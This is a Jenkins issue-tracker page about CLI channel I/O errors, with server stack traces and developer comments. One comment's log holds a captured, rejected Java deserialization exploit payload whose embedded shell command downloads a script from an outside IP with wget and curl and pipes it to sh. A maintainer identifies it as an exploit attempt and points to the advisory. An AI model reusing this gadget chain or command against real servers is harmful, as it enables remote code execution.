Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-7052

SEVERE: I/O error in channel HTTP full-duplex channel

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Open (View Workflow)
    • Priority: Major
    • Resolution: Unresolved
    • Component/s: cli
    • Labels:
      None
    • Environment:
    • Similar Issues:

      Description

      Executing CLI commands over http in the recent Hudson revisions results in the following errors being printed in the server log:

      INFO: JNLP slave agent listener started on TCP port 52302
      22-Jul-2010 3:54:42 PM hudson.remoting.Channel$ReaderThread run
      SEVERE: I/O error in channel HTTP full-duplex channel b3cb0c36-1574-4924-946b-0113232c5e7c
      org.mortbay.jetty.EofException
      at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:303)
      at org.mortbay.jetty.HttpParser$Input.blockForContent(HttpParser.java:1050)
      at org.mortbay.jetty.HttpParser$Input.read(HttpParser.java:987)
      at java.io.ObjectInputStream$PeekInputStream.peek(ObjectInputStream.java:2249)
      at java.io.ObjectInputStream$BlockDataInputStream.peek(ObjectInputStream.java:2542)
      at java.io.ObjectInputStream$BlockDataInputStream.peekByte(ObjectInputStream.java:2552)
      at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1297)
      at java.io.ObjectInputStream.readObject(ObjectInputStream.java:351)
      at hudson.remoting.Channel$ReaderThread.run(Channel.java:869)

      I run Hudson in jetty with:

      mvn hudson-dev:run

      and I execute the CLI as follows:

      java -jar ./war/target/hudson/WEB-INF/hudson-cli.jar -s http://localhost:8080/ help

      When I run Hudson (1.355) inside Tomcat I get a similar error:

      INFO: Accepted connection #1 from /127.0.0.1:38064
      Jul 22, 2010 11:02:08 AM hudson.TcpSlaveAgentListener$ConnectionHandler run
      WARNING: Connection #1 failed
      java.io.EOFException
      at java.io.DataInputStream.readUnsignedShort(DataInputStream.java:323)
      at java.io.DataInputStream.readUTF(DataInputStream.java:572)
      at java.io.DataInputStream.readUTF(DataInputStream.java:547)
      at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:162)
      Jul 22, 2010 11:02:13 AM hudson.TcpSlaveAgentListener$ConnectionHandler run
      INFO: Accepted connection #2 from /127.0.0.1:38089
      Jul 22, 2010 11:02:13 AM hudson.TcpSlaveAgentListener$ConnectionHandler run
      WARNING: Connection #2 failed
      java.io.EOFException
      at java.io.DataInputStream.readUnsignedShort(DataInputStream.java:323)
      at java.io.DataInputStream.readUTF(DataInputStream.java:572)
      at java.io.DataInputStream.readUTF(DataInputStream.java:547)
      at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:162)
      Jul 22, 2010 11:03:16 AM hudson.remoting.Channel$ReaderThread run
      SEVERE: I/O error in channel HTTP full-duplex channel f6497f2a-1ca1-4699-b5b4-0a22b39b947e
      java.net.SocketTimeoutException
      at org.apache.coyote.http11.InternalAprInputBuffer.fill(InternalAprInputBuffer.java:791)
      at org.apache.coyote.http11.InternalAprInputBuffer$SocketInputBuffer.doRead(InternalAprInputBuffer.java:822)
      at org.apache.coyote.http11.filters.ChunkedInputFilter.readBytes(ChunkedInputFilter.java:243)
      at org.apache.coyote.http11.filters.ChunkedInputFilter.parseChunkHeader(ChunkedInputFilter.java:273)
      at org.apache.coyote.http11.filters.ChunkedInputFilter.doRead(ChunkedInputFilter.java:132)
      at org.apache.coyote.http11.InternalAprInputBuffer.doRead(InternalAprInputBuffer.java:733)
      at org.apache.coyote.Request.doRead(Request.java:428)
      at org.apache.catalina.connector.InputBuffer.realReadBytes(InputBuffer.java:304)
      at org.apache.tomcat.util.buf.ByteChunk.substract(ByteChunk.java:372)
      at org.apache.catalina.connector.InputBuffer.readByte(InputBuffer.java:317)
      at org.apache.catalina.connector.CoyoteInputStream.read(CoyoteInputStream.java:105)
      at java.io.ObjectInputStream$PeekInputStream.peek(ObjectInputStream.java:2249)
      at java.io.ObjectInputStream$BlockDataInputStream.peek(ObjectInputStream.java:2542)
      at java.io.ObjectInputStream$BlockDataInputStream.peekByte(ObjectInputStream.java:2552)
      at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1297)
      at java.io.ObjectInputStream.readObject(ObjectInputStream.java:351)
      at hudson.remoting.Channel$ReaderThread.run(Channel.java:856)

      Other than this server exception, the CLI seems to work fine. It outputs the expected result and java returns a zero error code.

        Attachments

          Issue Links

            Activity

            Hide
            dmcnaught Duncan McNaught added a comment -

            Hi Richard,
            Yes the path in my command was to the exploded cli jar with 1.440. I removed hudson.war and hudson/ from webapps when I upgraded to make sure.
            I timed it twice and it took 21 seconds to time out.
            Thanks
            --Duncan

            Show
            dmcnaught Duncan McNaught added a comment - Hi Richard, Yes the path in my command was to the exploded cli jar with 1.440. I removed hudson.war and hudson/ from webapps when I upgraded to make sure. I timed it twice and it took 21 seconds to time out. Thanks --Duncan
            Hide
            oldelvet Richard Mortimer added a comment -

            Hmmm. 21 seconds should be covered by the new 15 second "ping" period. 21 (well 20) seconds is what I believe the tomcat default timeout is so again that fits with your observations.

            So my immediate thought is that somehow you aren't running the new cli.jar file or something similar on the server side.

            Failing that we could try dropping the ping period to say 5 seconds and if that doesn't work then it would be good to get hold of a network packet capture between cli and server to work out just what is going on.

            Show
            oldelvet Richard Mortimer added a comment - Hmmm. 21 seconds should be covered by the new 15 second "ping" period. 21 (well 20) seconds is what I believe the tomcat default timeout is so again that fits with your observations. So my immediate thought is that somehow you aren't running the new cli.jar file or something similar on the server side. Failing that we could try dropping the ping period to say 5 seconds and if that doesn't work then it would be good to get hold of a network packet capture between cli and server to work out just what is going on.
            Hide
            dothebart Wilfried Goesgens added a comment -

            Hi,

            I'm getting them also, and its flodding the log (120G in a week)

             

            Jan 16, 2018 2:04:46 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run
            SEVERE: I/O error in channel HTTP full-duplex channel 3eb3202b-1499-4789-afa6-e3569719db38
            hudson.remoting.DiagnosedStreamCorruptionException
            Read back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00
            Read ahead: 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a
            'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*<' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 '' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 '^' 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x03 'foosr' 0x00 'org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 '[Lorg/apache/commons/collections/Transformer;xpur' 0x00 '[Lorg.apache.commons.collections.Transformer;' 0xbd 'V' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 '' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a
            'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 '' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 '' 0x00 0x1b 'sq' 0x00 '' 0x00 0x13 'uq' 0x00 '' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 '' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 '' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 '' 0x00 0x18 'sq' 0x00 '' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 'e/bin/sh wget -q http://80.211.243.137:80/irp -O - | sh;curl -s http://80.211.243.137:80/irp -o - | sht' 0x00 0x04 'execuq' 0x00 '' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 '' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a
            'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 '' 0x00 0x11 0x00 0x00 0x00 '/0-' 0x02 0x14 'vy,' 0xd2 0xdd 0x9a 0xfd 0xb8 0x15 0xc7 '-' 0x7f 0xab 0x0e 0x04 'W' 0xd0 0xe7 0xca 'R' 0x02 0x15 0x00 0x87 '$' 0xf0 0x0d '03#' 0xfb 0xff '0' 0x17 'j' 0x83 0xe2 0x05 '3C' 0xf8 0xde '6t' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 '' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x04 'asdfxxsq' 0x00 '' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 '' 0x00 ' sq' 0x00 '' 0x00 0x02 'sq' 0x00 '' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 '' 0x00 0x1a 'q' 0x00 '' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px'
            at hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:85)
            at hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93)
            at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75)
            at hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:63)
            Caused by: java.lang.SecurityException: Rejected: org.apache.commons.collections.map.ReferenceMap
            at hudson.remoting.ClassFilter.check(ClassFilter.java:75)
            at hudson.remoting.ObjectInputStreamEx.resolveClass(ObjectInputStreamEx.java:57)
            at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1863)
            at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1746)
            at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2037)
            at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
            at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
            at hudson.remoting.Command.readFrom(Command.java:110)
            at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70)
            ... 1 more

            Show
            dothebart Wilfried Goesgens added a comment - Hi, I'm getting them also, and its flodding the log (120G in a week)   Jan 16, 2018 2:04:46 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run SEVERE: I/O error in channel HTTP full-duplex channel 3eb3202b-1499-4789-afa6-e3569719db38 hudson.remoting.DiagnosedStreamCorruptionException Read back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00 Read ahead: 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a 'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*<' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 ' ' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 '^' 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x03 'foosr' 0x00 ' org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 ' [Lorg/apache/commons/collections/Transformer;xpur' 0x00 ' [Lorg.apache.commons.collections.Transformer;' 0xbd 'V ' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 ' ' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a 'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 ' ' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 ' ' 0x00 0x1b 'sq' 0x00 ' ' 0x00 0x13 'uq' 0x00 ' ' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 ' ' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 ' ' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 ' ' 0x00 0x18 'sq' 0x00 ' ' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 'e/bin/sh wget -q http://80.211.243.137:80/irp -O - | sh;curl -s http://80.211.243.137:80/irp -o - | sht' 0x00 0x04 'execuq' 0x00 ' ' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 ' ' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a 'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 ' ' 0x00 0x11 0x00 0x00 0x00 '/0-' 0x02 0x14 'vy,' 0xd2 0xdd 0x9a 0xfd 0xb8 0x15 0xc7 '-' 0x7f 0xab 0x0e 0x04 'W' 0xd0 0xe7 0xca 'R' 0x02 0x15 0x00 0x87 '$' 0xf0 0x0d '03#' 0xfb 0xff '0' 0x17 'j' 0x83 0xe2 0x05 '3C' 0xf8 0xde '6t' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 ' ' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x04 'asdfxxsq' 0x00 ' ' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 ' ' 0x00 ' sq' 0x00 ' ' 0x00 0x02 'sq' 0x00 ' ' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 ' ' 0x00 0x1a 'q' 0x00 ' ' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px' at hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:85) at hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93) at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75) at hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:63) Caused by: java.lang.SecurityException: Rejected: org.apache.commons.collections.map.ReferenceMap at hudson.remoting.ClassFilter.check(ClassFilter.java:75) at hudson.remoting.ObjectInputStreamEx.resolveClass(ObjectInputStreamEx.java:57) at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1863) at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1746) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2037) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428) at hudson.remoting.Command.readFrom(Command.java:110) at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70) ... 1 more
            Hide
            oleg_nenashev Oleg Nenashev added a comment -

            Whatever is created in the CLI component, does not get read by anybody.
            Daniel Beck I propose to remove this component and move tickets to the core

            Show
            oleg_nenashev Oleg Nenashev added a comment - Whatever is created in the CLI component, does not get read by anybody. Daniel Beck I propose to remove this component and move tickets to the core
            Hide
            danielbeck Daniel Beck added a comment -

            Wilfried Goesgens You're running a public Jenkins instance and someone's attempting to run automated exploits. If you haven't yet, update to 2.46.2 or newer ASAP, and disable the remoting-based CLI: https://jenkins.io/security/advisory/2017-04-26/#cli-unauthenticated-remote-code-execution

             

            Oleg Nenashev Well, my dashboard has it for new issues But not opposed to merging.

            Show
            danielbeck Daniel Beck added a comment - Wilfried Goesgens You're running a public Jenkins instance and someone's attempting to run automated exploits. If you haven't yet, update to 2.46.2 or newer ASAP, and disable the remoting-based CLI: https://jenkins.io/security/advisory/2017-04-26/#cli-unauthenticated-remote-code-execution   Oleg Nenashev Well, my dashboard has it for new issues But not opposed to merging.

              People

              • Assignee:
                Unassigned
                Reporter:
                plouj plouj
              • Votes:
                6 Vote for this issue
                Watchers:
                7 Start watching this issue

                Dates

                • Created:
                  Updated: